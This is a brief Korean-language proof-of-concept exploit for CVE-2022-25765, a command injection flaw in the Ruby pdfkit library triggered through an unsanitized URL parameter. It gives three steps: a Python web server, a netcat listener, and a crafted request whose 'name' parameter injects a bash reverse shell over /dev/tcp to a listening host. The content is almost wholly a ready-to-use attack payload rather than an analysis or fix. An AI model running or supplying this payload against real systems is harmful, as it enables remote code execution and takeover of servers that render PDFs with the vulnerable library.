
CVE-2022-25765에 대한 개념 증명 익스플로잇으로, pdfkit 0.8.6에서 정화되지 않은 URL 매개변수를 통한 명령 주입을 시연하여 원격 코드 실행 및 리버스 셸을 가능하게 합니다.
0.0.0 버전부터의 pdfkit 패키지는 URL이 제대로 삭제(sanitize)되지 않아 명령 삽입(Command Injection)에 취약합니다.
1- python3 -m http.server 80
2- nc -lnvp 'Target Port'
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}